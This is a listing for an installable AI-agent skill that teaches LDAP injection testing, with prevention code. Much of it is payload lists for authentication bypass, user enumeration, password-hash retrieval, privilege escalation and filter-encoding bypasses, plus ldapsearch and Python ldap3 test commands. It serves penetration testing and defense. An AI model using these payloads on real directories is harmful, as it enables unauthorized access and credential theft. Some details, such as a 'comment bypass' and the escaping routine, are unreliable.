ldap-injection-testing

Original🇨🇳 Chinese
Translated

Professional Skills and Methodologies for LDAP Injection Vulnerability Testing

5installs
Sourceed1s0nz/cyberstrikeai
Added on

NPX Install

npx skill4agent add ed1s0nz/cyberstrikeai ldap-injection-testing

Tags

Translated version includes tags in frontmatter
ldap-injectionvulnerability-testingpenetration-testingsecurity-defenseexploit-techniques

SKILL.md Content (Chinese)

View Translation Comparison →

LDAP Injection Vulnerability Testing

Overview

LDAP injection is a vulnerability similar to SQL injection, which exploits flaws in the construction of LDAP query statements and may lead to information disclosure, privilege bypass, etc. This skill provides methods for detection, exploitation, and prevention of LDAP injection.

Vulnerability Principle

Applications directly splice user input into LDAP query statements without sufficient validation and filtering, allowing attackers to modify query logic.
Dangerous Code Example:
java
String filter = "(&(cn=" + userInput + ")(userPassword=" + password + "))";
ldapContext.search(baseDN, filter, ...);

LDAP Basics

Query Syntax

Basic Queries:
(cn=John)
(objectClass=person)
(&(cn=John)(mail=john@example.com))
(|(cn=John)(cn=Jane))
(!(cn=John))

Special Characters

Characters Requiring Escaping:
  • (
    )
    - Parentheses
  • *
    - Wildcard
  • \
    - Escape character
  • /
    - Path separator
  • NUL
    - Null character

Testing Methods

1. Identify LDAP Input Points

Common Functions:
  • User login
  • User search
  • Directory browsing
  • Permission verification

2. Basic Detection

Test Special Characters:
*)(&
*)(|
*))(
*))%00
Test Logical Operators:
*)(&(cn=*
*)(|(cn=*
*))(!(cn=*

3. Authentication Bypass

Basic Bypass:
Username: *)(&
Password: *
Query: (&(cn=*)(&)(userPassword=*))
More Precise Bypass:
Username: admin)(&(cn=admin
Password: *))
Query: (&(cn=admin)(&(cn=admin)(userPassword=*)))

4. Information Disclosure

Enumerate Users:
*)(cn=*
*)(uid=*
*)(mail=*
Retrieve Attributes:
*)(|(cn=*)(userPassword=*
*)(|(objectClass=*)(cn=*

Exploitation Techniques

Authentication Bypass

Method 1: Logical Bypass
Input: *)(&
Query: (&(cn=*)(&)(userPassword=*))
Result: Matches all users
Method 2: Comment Bypass
Input: admin)(&(cn=admin
Query: (&(cn=admin)(&(cn=admin)(userPassword=*)))
Method 3: Wildcard
Input: *)(|(cn=*)(userPassword=*
Query: (&(cn=*)(|(cn=*)(userPassword=*)(userPassword=*))

Information Disclosure

Enumerate All Users:
Search: *)(cn=*
Result: Returns all cn attributes
Retrieve Password Hashes:
Search: *)(|(cn=*)(userPassword=*
Result: Returns users and password hashes
Retrieve Sensitive Attributes:
Search: *)(|(cn=*)(mail=*)(telephoneNumber=*
Result: Returns multiple sensitive attributes

Privilege Escalation

Modify Query Logic:
Original: (&(cn=user)(memberOf=CN=Users,DC=example,DC=com))
Injection: user)(memberOf=CN=Admins,DC=example,DC=com))(|(cn=user
Result: May bypass permission checks

Bypass Techniques

Encoding Bypass

URL Encoding:
*)(& → %2A%29%28%26
*)(| → %2A%29%28%7C
Unicode Encoding:
* → \u002A
( → \u0028
) → \u0029

Comment Bypass

Using Comments:
*)(&(cn=*
*)(|(cn=*

Null Character Injection

Using NULL Byte:
*))%00

Tool Usage

JXplorer

Graphical LDAP Client:
  • Connect to LDAP server
  • Browse directory structure
  • Execute query tests

ldapsearch

bash
# Basic Query
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(cn=*)"

# Test Injection
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(cn=*)(&"

Burp Suite

  1. Intercept LDAP query requests
  2. Modify query parameters
  3. Observe response results

Python Script

python
import ldap3

server = ldap3.Server('ldap://target.com')
conn = ldap3.Connection(server, authentication=ldap3.SIMPLE,
                        user='cn=admin,dc=example,dc=com',
                        password='password')

# Test Injection
filter_str = '*)(&'
conn.search('dc=example,dc=com', filter_str)
print(conn.entries)

Verification and Reporting

Verification Steps

  1. Confirm control over LDAP queries
  2. Verify authentication bypass or information disclosure
  3. Assess impact (unauthorized access, data leakage, etc.)
  4. Record complete POC

Report Key Points

  • Vulnerability location and input parameters
  • LDAP query construction method
  • Complete exploitation steps and PoC
  • Fix recommendations (input validation, parameterized queries, etc.)

Prevention Measures

Recommended Solutions

  1. Input Validation
    java
    private static final String[] LDAP_ESCAPE_CHARS = 
    {"\\", "*", "(", ")", "\0", "/"};

public static String escapeLDAP(String input) {
    if (input == null) {
      return null;
    }
    StringBuilder sb = new StringBuilder();
    for (int i = 0; i < input.length(); i++) {
      char c = input.charAt(i);
      if (Arrays.asList(LDAP_ESCAPE_CHARS).contains(String.valueOf(c))) {
        sb.append("\\");
      }
      sb.append(c);
    }
    return sb.toString();
}
  2. Parameterized Queries
    java
    // Use parameterized functionality of LDAP API
String filter = "(&(cn={0})(userPassword={1}))";
Object[] args = {escapedCN, escapedPassword};
// Build query using API
  3. Whitelist Validation
    java
    // Only allow specific characters
if (!input.matches("^[a-zA-Z0-9@._-]+$")) {
    throw new IllegalArgumentException("Invalid input");
}
  4. Least Privilege
    • Use accounts with minimal privileges for LDAP connections
    • Restrict queryable attributes
    • Use access control lists
  5. Error Handling
    • Do not return detailed error information
    • Use unified error responses
    • Record error logs

Notes

  • Only perform in authorized testing environments
  • Note syntax differences between different LDAP servers
  • Avoid impacting the directory during testing
  • Understand the target LDAP server configuration